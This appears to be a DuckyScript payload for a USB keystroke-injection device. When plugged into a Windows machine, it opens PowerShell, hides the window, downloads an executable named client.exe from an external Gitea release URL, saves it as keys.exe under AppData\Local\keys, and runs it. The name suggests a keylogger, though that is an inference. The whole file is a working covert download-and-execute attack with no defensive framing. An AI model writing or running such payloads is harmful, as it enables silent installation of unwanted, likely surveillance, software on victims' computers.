REM open powershell
WINDOWS r
DELAY 1000
STRING powershell
ENTER
DELAY 3000

REM run rest in background
STRING powershell.exe -WindowStyle hidden {
STRING $OpDir = "$(pwd)\AppData\Local\keys";

REM download client.exe file
STRING Invoke-WebRequest https://gitea.svitan.dev/Streamer272/keys/releases/download/latest/client.exe -OutFile "$OpDir\keys.exe";

REM client.exe file (closes automatically)
STRING Start-Process -FilePath "$OpDir\keys.exe" -NoNewWindow }
ENTER
